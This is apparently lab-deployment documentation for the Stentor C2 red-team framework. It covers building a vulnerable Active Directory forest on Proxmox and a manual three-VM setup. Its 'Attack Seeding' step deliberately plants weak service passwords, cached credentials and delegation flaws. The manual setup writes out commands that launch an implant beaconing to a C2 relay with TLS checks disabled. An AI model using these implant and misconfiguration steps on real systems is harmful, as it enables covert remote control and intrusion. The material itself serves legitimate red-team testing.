
Lab Deployment

A Stentor lab provides a safe environment for testing C2 operations, validating implant functionality, and developing new techniques. This guide covers two deployment approaches: an automated IaC pipeline that deploys an 8-VM Active Directory forest with a single command, and a manual 3-VM setup for quick testing.


Prerequisites

The automated lab pipeline requires the following tools. Verify installation with make check (runs scripts/check-prerequisites.sh).

| Tool | Version | Purpose | Install |
|---|---|---|---|
| Packer | 1.11+ | Build VM templates from ISO | hashicorp.com/packer |
| Terraform | 1.9+ | Provision VMs from templates | hashicorp.com/terraform |
| Ansible | 2.17+ | Configure AD, users, GPOs | pip install ansible |
| curl | any | Proxmox API calls | Pre-installed on most systems |
| jq | any | JSON parsing | brew install jq / apt install jq |

Ansible collections (installed automatically by playbooks):

  • ansible.windows (2.5+) -- Windows module set
  • microsoft.ad (1.7+) -- Active Directory management
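
The version checks that make check performs can be sketched in shell. This is an illustrative sketch only — the helper names below are hypothetical, and the real logic lives in scripts/check-prerequisites.sh:

```shell
#!/usr/bin/env bash
# Hypothetical sketch of a prerequisite check (the actual script may differ).

# True if installed version $1 satisfies minimum version $2 (semver-ish,
# using GNU sort's version comparison).
version_ge() {
  [ "$(printf '%s\n%s\n' "$2" "$1" | sort -V | head -n1)" = "$2" ]
}

# True if a command exists on PATH.
have() { command -v "$1" >/dev/null 2>&1; }

check() {  # check <tool> <min-version> <installed-version>
  if have "$1" && version_ge "$3" "$2"; then
    echo "OK: $1 $3 (>= $2)"
  else
    echo "MISSING/OLD: $1 (need >= $2)"
  fi
}

# Example: packer prints a version like "1.11.2"
# check packer 1.11 "$(packer --version | tr -d 'v')"
```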

Lab Architecture

The automated pipeline deploys an 8-VM Active Directory forest on Proxmox, simulating a realistic corporate environment with domain controllers, workstations, file servers, and application servers.

graph TB
    subgraph Proxmox["Proxmox Host (<proxmox-ip>)"]
        subgraph DC["Domain Controllers"]
            DC01["DC01<br/>10.10.10.10<br/>Primary DC"]
            DC02["DC02<br/>10.10.10.11<br/>Replica DC"]
        end

        subgraph WS["Workstations"]
            WS01["WS01<br/>10.10.10.21<br/>Engineering"]
            WS02["WS02<br/>10.10.10.22<br/>HR"]
            WS03["WS03<br/>10.10.10.23<br/>Finance"]
        end

        subgraph SRV["Servers"]
            FILE01["FILE01<br/>10.10.10.30<br/>File Server"]
            SRV01["SRV01<br/>10.10.10.40<br/>SQL + IIS"]
            WEB01["WEB01<br/>10.10.10.50<br/>nginx/Apache"]
        end
    end

    DC01 <-->|Replication| DC02
    WS01 & WS02 & WS03 -->|Domain Join| DC01
    FILE01 & SRV01 -->|Domain Join| DC01

VM Inventory

| VM | VMID | IP | OS | Role | CPU | RAM |
|---|---|---|---|---|---|---|
| DC01 | 200 | 10.10.10.10 | Windows Server 2022 | Primary Domain Controller | 2 | 4 GB |
| DC02 | 201 | 10.10.10.11 | Windows Server 2022 | Replica Domain Controller | 2 | 4 GB |
| WS01 | 210 | 10.10.10.21 | Windows 10 | Workstation (Engineering) | 2 | 4 GB |
| WS02 | 211 | 10.10.10.22 | Windows 10 | Workstation (HR) | 2 | 4 GB |
| WS03 | 212 | 10.10.10.23 | Windows 10 | Workstation (Finance) | 2 | 4 GB |
| FILE01 | 220 | 10.10.10.30 | Windows Server 2022 | File Server | 2 | 4 GB |
| SRV01 | 230 | 10.10.10.40 | Windows Server 2022 | App Server (SQL + IIS) | 2 | 4 GB |
| WEB01 | 240 | 10.10.10.50 | Ubuntu 22.04 | Web Server (nginx/Apache) | 2 | 2 GB |

All VMs share the 10.10.10.0/24 subnet on Proxmox bridge vmbr0. DNS is served by DC01 (primary) and DC02 (secondary) for the lab.local domain. Gateway: 10.10.10.1 (Proxmox host bridge).


Quick Start

# 1. Configure Proxmox credentials and ISO paths
cp lab/.env.example lab/.env
# Edit lab/.env with your settings

# 2. Verify prerequisites
cd lab && make check

# 3. Deploy everything (templates + provision + configure + integrate)
make deploy

One-command deployment

make deploy runs the prerequisite check followed by the four pipeline stages in sequence: Packer templates, Terraform provisioning, Ansible configuration, and C2 integration. The first full run takes approximately 2-3 hours, most of it spent building the Windows templates from ISO.


Pipeline Overview

The lab uses a four-stage Infrastructure-as-Code pipeline. Each stage can be run independently or as part of the full make deploy pipeline.

flowchart LR
    A["Stage 1<br/><b>Packer</b><br/>make templates"] --> B["Stage 2<br/><b>Terraform</b><br/>make provision"]
    B --> C["Stage 3<br/><b>Ansible</b><br/>make configure"]
    C --> D["Stage 4<br/><b>C2 Integration</b><br/>make integrate"]

    A1["ISO files"] --> A
    A --> A2["VM Templates<br/>(9000-9002)"]
    B --> B2["8 Lab VMs<br/>(200-240)"]
    C --> C2["AD Forest<br/>lab.local"]
    D --> D2["Relay + Listener<br/>+ Beacon"]

Stage 1: Packer Templates (make templates)

Packer builds three base VM templates from ISO files on Proxmox storage. Templates are golden images that Terraform clones to create lab VMs.

Template Inventory

| Template | VMID | OS | Post-Build Configuration |
|---|---|---|---|
| Windows Server 2022 | 9000 | Win Server 2022 Eval | WinRM enabled, QEMU Guest Agent, VirtIO drivers, Sysprepped |
| Windows 10 Enterprise | 9001 | Win10 22H2 Eval | WinRM enabled, QEMU Guest Agent, VirtIO drivers, Sysprepped |
| Ubuntu 22.04 LTS | 9002 | Ubuntu 22.04 Server | SSH enabled, QEMU Guest Agent, cloud-init ready |

Key behaviors:

  • Idempotent: Checks the Proxmox API before building; skips templates that already exist.
  • Individual builds: make template-win-server, make template-win10, make template-ubuntu
  • Build time: Windows templates take 30-60 minutes each (ISO install + Sysprep). Ubuntu takes approximately 15 minutes.
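
The idempotency check can be illustrated with a small sketch. This is an assumption about the mechanism, not the pipeline's actual code: it queries the Proxmox /cluster/resources endpoint (a real API path) with token auth from lab/.env and greps for the VMID:

```shell
# Sketch of an idempotent template check (illustrative; the Makefile's real
# implementation may differ). Assumes token-auth variables from lab/.env.

template_exists() {  # template_exists <vmid>
  # /cluster/resources?type=vm lists every VM and template with its vmid.
  curl -sk \
    -H "Authorization: PVEAPIToken=${PROXMOX_API_TOKEN}=${PROXMOX_API_SECRET}" \
    "${PROXMOX_URL}/cluster/resources?type=vm" \
  | grep -q "\"vmid\":$1[,}]"
}

# Skip the slow Packer build when the template is already present:
# template_exists 9000 || make template-win-server
```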

ISO prerequisite

ISOs must be uploaded to Proxmox storage (local:iso/) before building templates. Use the Proxmox web UI: Datacenter > Storage > local > ISO Images > Upload.

Download evaluation ISOs from the Microsoft Evaluation Center (Windows Server 2022, Windows 10 Enterprise) and from ubuntu.com (Ubuntu 22.04 Server).

Key files:

| Path | Description |
|---|---|
| packer/*.pkr.hcl | Packer template definitions |
| packer/files/autounattend/ | Windows unattended install XML |
| packer/scripts/ | Provisioning scripts (WinRM setup, Sysprep) |
| packer/http/ | HTTP-served files (preseed, autoinstall) |

Stage 2: Terraform Provisioning (make provision)

Terraform clones the Packer templates into 8 lab VMs with static IPs, resource allocation, and network configuration. It also generates the Ansible inventory file from Terraform outputs.

What it does:

  1. Clones each template into a full VM with assigned VMID, IP, CPU, and RAM.
  2. Configures network interfaces on the vmbr0 bridge with static IPs.
  3. Generates ansible/inventory/hosts.yml from Terraform outputs for seamless handoff to Stage 3.

Key commands:

# Provision all VMs
make provision

# View current Terraform state
make status

Variables are defined in terraform/variables.tf and can be overridden via lab/.env:

| Variable | Default | Description |
|---|---|---|
| proxmox_endpoint | -- | Proxmox API URL |
| storage_pool | local-lvm | Proxmox storage pool for VM disks |
| network_bridge | vmbr0 | Network bridge for VM interfaces |
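
Terraform also reads any input variable from a TF_VAR_-prefixed environment variable (standard Terraform behavior), which is presumably how the lab/.env overrides reach Stage 2. A hypothetical helper showing the naming convention:

```shell
# Terraform maps TF_VAR_<name> environment variables onto input variables.
# env_to_tfvar is a hypothetical helper illustrating the naming convention.
env_to_tfvar() {
  printf 'TF_VAR_%s' "$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')"
}

# e.g. STORAGE_POOL in lab/.env corresponds to TF_VAR_storage_pool:
# export "$(env_to_tfvar STORAGE_POOL)=local-zfs" && make provision
```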

Key files:

| Path | Description |
|---|---|
| terraform/main.tf | Provider config and VM resource definitions |
| terraform/variables.tf | Input variables (Proxmox connection, VM specs) |
| terraform/outputs.tf | Ansible inventory generation from VM data |
| terraform/modules/vm/ | Reusable VM module |
| terraform/templates/ | Ansible inventory template |

Stage 3: Ansible Configuration (make configure)

Ansible configures the complete Active Directory environment, transforming bare VMs into a realistic corporate network.

# Run all Ansible playbooks
make configure

Configuration Steps

| Step | Target | Description |
|---|---|---|
| DC Promotion | DC01, DC02 | DC01 promoted as forest root (lab.local), DC02 joined as replica |
| Domain Join | All Windows VMs | Join all workstations and servers to the lab.local domain |
| AD Population | DC01 | 25 users, 5 departments, service accounts, nested groups |
| GPO Deployment | Domain | Workstation and server security policies, audit policies |
| Server Config | FILE01, SRV01, WEB01 | File shares, SQL/IIS installation, web services |
| Attack Seeding | Various | Weak passwords, cached credentials, delegation misconfigurations |

Red team testing readiness

The Attack Seeding step deliberately introduces common AD misconfigurations:

  • Weak service account passwords (Kerberoastable SPNs)
  • Cached domain credentials on workstations
  • Unconstrained delegation on specific machines
  • Writable Group Policy paths
  • Overly permissive file share ACLs

These create realistic attack paths for testing Stentor's post-exploitation modules.

Key files:

| Path | Description |
|---|---|
| ansible/site.yml | Main playbook entry point |
| ansible/group_vars/ | Group variable files (domain settings, passwords) |
| ansible/roles/ | Individual configuration roles |
| ansible/inventory/ | Generated by Terraform (gitignored) |

Stage 4: C2 Integration (make integrate)

The final stage connects Stentor's C2 infrastructure to the lab environment, establishing the relay-listener-beacon chain.

# Run C2 integration
make integrate

What it does:

  1. Registers the relay in the Stentor database (if not already present).
  2. Creates and starts an HTTPS listener on the relay.
  3. Deploys the implant to WS01 (or a custom VMID).
  4. Verifies the beacon appears in the Stentor backend.

Additional C2 Commands

# Check relay, listener, and beacon status
make c2-status

# Deploy implant to a specific VM
VMID=212 make c2-deploy-implant

Key files:

| Path | Description |
|---|---|
| scripts/c2-integrate.sh | Full C2 integration script |
| scripts/c2-status.sh | Status checker for relay/listener/beacon |
| scripts/c2-deploy-implant.sh | Implant deployment to specific VMs |

Configuration

Environment File

Copy lab/.env.example to lab/.env and configure the following sections.

Proxmox Connection

Two authentication methods are supported:

# Method 1: username/password
PROXMOX_URL=https://<proxmox-ip>:8006/api2/json
PROXMOX_NODE=proxmox
PROXMOX_USERNAME=root@pam
PROXMOX_PASSWORD=your-password

# Method 2: API token
PROXMOX_URL=https://<proxmox-ip>:8006/api2/json
PROXMOX_NODE=proxmox
PROXMOX_API_TOKEN=root@pam!stentor-lab
PROXMOX_API_SECRET=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

Creating API tokens

Proxmox web UI > Datacenter > Permissions > API Tokens > Add. Use format user@realm!token-name.
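
With a token in hand, API calls carry it in an Authorization header. The PVEAPIToken scheme below is Proxmox's documented format; the wrapper function itself is a hypothetical convenience, not part of the lab scripts:

```shell
# Minimal wrapper for authenticated Proxmox API calls using the token
# variables from lab/.env (pve_api is a hypothetical helper).
pve_api() {  # pve_api <path>, e.g. pve_api /version
  curl -sk \
    -H "Authorization: PVEAPIToken=${PROXMOX_API_TOKEN}=${PROXMOX_API_SECRET}" \
    "${PROXMOX_URL}$1"
}

# Quick smoke test of the credentials:
# pve_api /version | jq .
```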

ISO Paths

ISOs use Proxmox storage notation (local:iso/filename.iso), not filesystem paths.

ISO_WIN_SERVER=local:iso/SERVER_EVAL_x64FRE_en-us.iso
ISO_WIN10=local:iso/22631.2428_PROFESSIONAL_x64_en-us.iso
ISO_UBUNTU=local:iso/ubuntu-22.04.4-live-server-amd64.iso
ISO_VIRTIO=local:iso/virtio-win.iso

Common mistake

Do not use filesystem paths like /var/lib/vz/template/iso/ubuntu.iso. Packer communicates with the Proxmox API, which expects storage notation.
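
The mapping from filesystem path to storage notation is mechanical. A hypothetical helper for illustration, plus the real pvesm command for listing what's actually uploaded:

```shell
# Convert a filesystem ISO path on 'local' storage to Proxmox storage
# notation (iso_notation is a hypothetical helper, not a lab script).
iso_notation() {
  printf 'local:iso/%s' "$(basename "$1")"
}

# iso_notation /var/lib/vz/template/iso/virtio-win.iso -> local:iso/virtio-win.iso
# To list ISOs actually present, run on the Proxmox host:
#   pvesm list local --content iso
```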

VMID Ranges

| Range | Purpose | Details |
|---|---|---|
| 100-111 | Existing manual VMs | Legacy DC01, Kali, Stentor Server, Win10 targets |
| 200-240 | Automated lab VMs | DC01-DC02, WS01-WS03, FILE01, SRV01, WEB01 |
| 9000-9002 | Packer templates | Win Server, Win10, Ubuntu base images |

Because the VMID ranges do not overlap, the automated lab can coexist with (and eventually replace) the manually created VMs.

Network Settings

NETWORK_BRIDGE=vmbr0
NETWORK_GATEWAY=10.10.10.1
NETWORK_SUBNET=24
STORAGE_POOL=local-lvm

Management Commands

# Full pipeline (check + templates + provision + configure + integrate)
make deploy

# Individual stages
make templates          # Build all Packer VM templates (idempotent)
make provision          # Deploy VMs with Terraform
make configure          # Run Ansible playbooks
make integrate          # Connect Stentor C2

# Status
make status             # Show current VM state via Terraform
make c2-status          # Check relay/listener/beacon status

# Teardown
make destroy            # Remove VMs (keep templates for fast rebuild)
make clean              # Remove VMs AND templates (full reset)

Teardown Options

| Command | Removes VMs | Removes Templates | Rebuild Time |
|---|---|---|---|
| make destroy | Yes | No | ~30 min (provision + configure) |
| make clean | Yes | Yes | 2-3 hours (templates + provision + configure) |

Preserve templates for fast iteration

Use make destroy instead of make clean when iterating on Ansible configuration. Templates take 30-60 minutes each to build from ISO, but Terraform can re-provision VMs from templates in minutes.


Troubleshooting

| Symptom | Cause | Fix |
|---|---|---|
| 401 Proxmox auth | Username missing realm suffix | Use root@pam, not root. API tokens use user@pam!token-name. Test: curl -sk -d "username=root@pam&password=PASS" https://HOST:8006/api2/json/access/ticket |
| ISO not found | Filesystem path used instead of storage notation | Use local:iso/filename.iso, not /var/lib/vz/template/iso/filename.iso. Verify via Proxmox UI > Storage > local > ISO Images. |
| Storage pool not found | Pool name varies across Proxmox installations | Check available pools with pvesm status on the Proxmox host, then update STORAGE_POOL in .env. |
| VMID already in use | Conflict with manually created VMs | Check existing VMs with qm list on the Proxmox host and adjust VMID variables in .env. |
| WinRM timeout | VirtIO drivers not loaded or WinRM not enabled | Ensure the VirtIO ISO is uploaded and its path is correct in .env, and that autounattend.xml includes WinRM setup. Packer waits up to 60 minutes before timing out. |
| Terraform state drift | VMs modified outside Terraform | Run terraform refresh to sync state. Never modify Terraform-managed VMs via the Proxmox UI; use terraform import for manually created resources. |
| Ansible connection refused | VMs not fully booted or WinRM not ready | Wait 2-3 minutes after provisioning. Test connectivity: ansible -i inventory/hosts.yml all -m win_ping (Windows) or -m ping (Linux). |
| Domain join fails | DC01 not promoted yet or DNS misconfigured | Ensure Ansible roles run in order (DC promotion before domain join). Verify DNS: workstations must use DC01/DC02 as DNS servers. |
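
For the "VMID already in use" symptom, a preflight check might look like the sketch below — a hypothetical helper around the real qm list command, to be run on the Proxmox host:

```shell
# True if no existing VM uses the given VMID (illustrative sketch; qm is
# only available on the Proxmox host). qm list prints VMID first, after a
# header row.
vmid_free() {
  ! qm list | awk 'NR>1 {print $1}' | grep -qx "$1"
}

# Check the whole automated-lab range before provisioning:
# for id in 200 201 210 211 212 220 230 240; do
#   vmid_free "$id" || echo "conflict: VMID $id already in use"
# done
```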

Directory Structure

lab/
  Makefile                    # Pipeline orchestration
  .env.example                # Configuration template (copy to .env)
  .gitignore                  # Protects secrets, state, cache
  README.md                   # Source documentation
  packer/
    *.pkr.hcl                 # Packer template definitions
    http/                     # HTTP-served files (preseed, autoinstall)
    scripts/                  # Provisioning scripts (WinRM, Sysprep)
    files/autounattend/       # Windows unattended install XML
  terraform/
    main.tf                   # Provider config, VM definitions
    variables.tf              # Input variables
    outputs.tf                # Ansible inventory generation
    modules/vm/               # Reusable VM module
    templates/                # Ansible inventory template
  ansible/
    site.yml                  # Main playbook entry
    inventory/                # Generated by Terraform (gitignored)
    group_vars/               # Group variable files
    roles/                    # Role per configuration task
  scripts/
    check-prerequisites.sh    # Tool verification
    c2-integrate.sh           # C2 integration script
    c2-status.sh              # Status checker
    c2-deploy-implant.sh      # Implant deployment

Quick Lab Setup (Manual 3-VM)

For operators who want a minimal test environment without the full AD forest, Stentor can run on a simple 3-VM setup.

Architecture

graph LR
    subgraph Proxmox["Proxmox Host"]
        VM103["Stentor Server<br/>VM 103 / 10.0.0.10<br/>Docker: backend + DB + UI"]
        VM102["Kali Relay<br/>VM 102 / 10.0.0.50<br/>stentor-relay service"]
        VM110["Win10 Target<br/>VM 110 / 10.0.0.20<br/>implant.exe"]
    end

    VM103 <-->|WebSocket| VM102
    VM110 -->|HTTPS :8443| VM102

| VM | VMID | IP | Role | Credentials |
|---|---|---|---|---|
| Stentor Server | 103 | 10.0.0.10 | Docker host (backend + DB + UI) | stentor/<server-password> |
| Kali Relay | 102 | 10.0.0.50 | Relay agent, C2 listeners | root/<relay-password> |
| Win10 Target | 110 | 10.0.0.20 | Implant execution target | QEMU Guest Agent |

Setup Steps

  1. Deploy server: Run ./update-stentor.sh to deploy Stentor to VM 103 via Docker.

  2. Login and get token:

    TOKEN=$(curl -s -X POST https://stentor.app/api/v1/auth/login \
      -H "Content-Type: application/json" \
      -d '{"email":"[email protected]","password":"your-password"}' \
      | jq -r '.access_token')
    

  3. Register relay in DB (required before relay can connect):

    ssh root@<proxmox-ip> 'ssh [email protected] \
      "docker exec -i stentor-db psql -U stentor -d stentor_db"' <<< \
      "INSERT INTO relays (id, name, description, ip_address, status) \
       VALUES ('aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee', 'Kali Relay', \
       'Kali relay agent', '10.0.0.50', 'online') \
       ON CONFLICT (id) DO NOTHING;"
    

  4. Restart relay service:

    ssh root@<proxmox-ip> 'sshpass -p "<relay-password>" ssh [email protected] \
      "systemctl restart stentor-relay"'
    

  5. Create and start listener:

    LISTENER_ID=$(curl -s -X POST https://stentor.app/api/v1/listeners \
      -H "Authorization: Bearer $TOKEN" \
      -H "Content-Type: application/json" \
      -d '{"name":"HTTPS Relay","type":"https","host":"10.0.0.50",
           "port":8443,"relay_id":"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"}' \
      | jq -r '.id')
    
    curl -s -X POST "https://stentor.app/api/v1/listeners/$LISTENER_ID/start" \
      -H "Authorization: Bearer $TOKEN"
    

  6. Deploy and run implant (see Relay Management for build instructions):

    # Kill old implant if running
    ssh root@<proxmox-ip> 'qm guest exec 110 -- cmd /c "taskkill /F /IM implant.exe"'
    
    # Run implant (CRITICAL: no space before &&)
    ssh root@<proxmox-ip> 'qm guest exec 110 --timeout 5 -- cmd /c \
      "set IMPLANT_C2_URL=https://10.0.0.50:8443&& \
       set IMPLANT_INSECURE_SKIP_VERIFY=true&& \
       C:\\Users\\Public\\implant.exe"'
    

  7. Verify beacon:

    curl -s https://stentor.app/api/v1/c2/beacons \
      -H "Authorization: Bearer $TOKEN" | jq
    

Common Gotchas

Manual setup pitfalls

  • Deploy confirmation: update-stentor.sh requires typing "yes" (not "y", not piping yes |).
  • Login response field: The token is in access_token, not token.
  • Beacon API path: Use /api/v1/c2/beacons, not /api/v1/cockpit/beacons.
  • cmd.exe env vars: No space before && -- trailing spaces become part of the variable value.
  • Relay before connect: The relay must be registered in the DB before starting the relay service (WebSocket returns 404 otherwise).
  • Listener must be started: Creating a listener sets status to stopped. You must also call the start endpoint.
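
The cmd.exe quirk in the fourth bullet can be made concrete: cmd assigns everything up to && to the variable, including trailing spaces, so "set X=y &&" stores "y " rather than "y". A hypothetical shell helper that builds the command string safely:

```shell
# Build a cmd.exe one-liner that sets environment variables and then runs a
# program. Note the deliberate absence of a space before '&&' -- with
# "set X=y &&", cmd would store "y " (trailing space) in X.
# (cmd_with_env is a hypothetical helper for illustration.)
cmd_with_env() {  # cmd_with_env VAR=value [VAR=value ...] -- program
  local out=""
  while [ "$1" != "--" ]; do
    out="${out}set $1&& "
    shift
  done
  shift
  printf '%s%s' "$out" "$1"
}

# cmd_with_env "IMPLANT_C2_URL=https://10.0.0.50:8443" -- "C:\Users\Public\implant.exe"
# -> set IMPLANT_C2_URL=https://10.0.0.50:8443&& C:\Users\Public\implant.exe
```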